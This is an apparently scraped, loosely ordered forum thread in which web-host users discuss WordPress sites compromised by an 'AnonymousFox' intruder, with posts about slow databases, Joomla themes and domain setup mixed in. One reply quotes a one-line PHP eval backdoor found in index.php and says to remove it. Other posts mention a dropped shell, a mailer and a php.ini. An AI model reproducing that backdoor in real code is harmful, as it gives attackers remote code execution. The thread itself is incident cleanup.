dream11

Mine was hacked, and it had a plugin that replaced the login system (it was a minecraft site, it uses a minecraft account to sign in...). The files were not renamed, but the users table he edited wasn't even being used except for options. The actual authentication was done against a server run by Mojang (er, Microsoft now), not the password field in the database.

so in your case the login details where in a third party server,

but does that means in your case the login url was still    xxx.com/wp-login.php  ?

maybe access to the login URL is a must for the bug to take efect, even if the way the manage to join is bypasses ese real login data

any of the people hacked had the default /wp-admin  or login.php  changed so they can't be accessed ?
or you all like me had the default URL setting to login access

wondering if this bug also affects on wordpress installs that had this feature ofuscated for better security

i see, well,  i can't use another CMS right now because the plugin i use to connect to another company is not available for a lot of platforms,
well it is, but the rest are payment platforms, shopify, bigcomerce, bigcartel, ecwid...blablabla,

anyway thnks for response

 

i have been trying wordpress on tommy but usually i feel like the server is pretty slow on response,
usually even more when something has to be modified in the database, sometimes its talkes like minutes to response, until it finally writes the cahnges,
the page doesn't load specially faster neither,

i wiped all the content and made a fresh install with a lightweight theme, i use very very simplistic website, but still load considerably slow,

since other sites i loaded with plain html usually loads quite well, might be a database related problem? maybe there is some bottleneck or so, but its for sure the connection to the db fails eventually like 30 to 60 seconds,

 

Im stuck, i installed joomla, managed to add 4 categories and i a menu. But the themes, there is no themes there... Any suggestion of a trust source to get free theme?

google and youtuber tutorials are your best friend

i downloaded the ofuscated  shell file and avira started to scream,

its not possible to install some antivirus in the server so php file shells can't be hosted ? that might help ?

i just found cpanel also accepts 2FA,

i know that would not had helped a lot if someone success to install a php shell over a wordpress bug,
but enabling it, would had helped to avoid a cpanel password change? or even access to other website in the same host? like they did, since i found the leafmailer also inside a second website i have in my account, and its not made with wordpress,

just wondering if the way they used to change the cpanel password might had been done in such way a 2FA would had made no difference,
 

but, does that explain the fact they were able to change cpanel passwords?

if they can compromise any clean wp up to date, then looks like makes no sense restoring any backup or just make a site again on wp until someone identify the actual bug,

i fail to understand how a compromissed wp account can be "extended" to other wp accounts,

might be related to a softaculous  issue? i did use it to install wp, and i remember over softaculous its possible to access to wp-admin in a single click,

dont know if there might be any correlation, same server... and lot of updated wp accounts... they all must have something in common

has the culprit been identified already? 

we know its not a plugin

we all were up to date on wp
we all got the cpanel pass compromised too

i dont want start over from zero if i can't identify the culprit, a server issue? two 0 day that allowed first to access to wp then scalate to the cpanel?

mines are those, but not all are enabled anyway, just installed
and as far as i see, we dont share a single one right now

my cpanel pass was not the same used on wordpress admin,

 

how can they change the Cpanel password with a wordpress bug?

is that possible?

what you mean with nuke? delete all content from public_html?

i end up changin the nameservers to avoid access from the URL but it might take some time to update...

need to know what was the bug, i mean, maybe a plugin we all have in common?  started to deactivate most plugins i have, how to know the compromised plugin if its that the problem? might be a wordpress zero day? i am so puzzled 

he is even playing with my wp! he changed the slogan, OMG... 

i am out the server again, that sucks, 

i have my wordpress up to date, must be a plugin? argh

***

account was hacked thanks

done,

sadly, i dont have backups as far as i remember

thanks,

to you looks like a wordpress hack or a server hack?

the fact they changed the cpanel scared me a bit, since they have access to do anything
 

In "index.php", remove this code at the start of file:

<?php eval($_POST['475454656']); ?>

The "php.ini" must be deleted because not belongs to Wordpress.

 

I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one.

 

Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole...

 

.

and what are the changes made at php.ini and index.php ?

i can delete the other files, but dont know what changed were made on the ini and php,

the other two new fles, one is a password protected php mailer,

and the other one is crypted shell access,

this has been clearly made for phishing,

Yes, the 'AnonymousFox' was the same administrator user rename as mine.

 

I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made.

 

I have done and scan from Wordfence, and I have the Wordpress installation modified:

 

New file: wp-admin/2125719357.php

New file: wp-content/1205929475.php

New file: wp-admin/php.ini

Modified file: index.php

same problem there, tried to open the cpanel, no luck,
i know the pass was correct so i didn't reset it,
few minutes later, i can't even try to login, and none of my websties loads, problem was the server blocking my ip for try too much,

now i reseted the cpanel password, and i can't login to WP, they also reseted the wordpress login, to username was changed to  "AnonymousFox"

what a shame, you have a shop and they can reset the paypal account to get the payments, and download all your clients data,


so what if you reset it back? they can still make it happen again if the bug is not patched
 

how do i change the primary domain at toomy?
it appears as a heliohost subdomain, and i want to point my .com
should i add my domain as an "addon domain" in the cpanel?

thats the way must be done? or i can just modify the primary domain ? i dont find any option

thanks

Invitation resent to the new address.

thnks all for your support and wonderful hosting

okey no problem, please send the invitation to this mail <removed>

thanks

Email address has been removed from the post.

 

Krydos can get it from Paypal for the invite.

i already received an invite to the paypal account i used,

i need the invite to be sent to another mail, the one i posted, should i post it again then?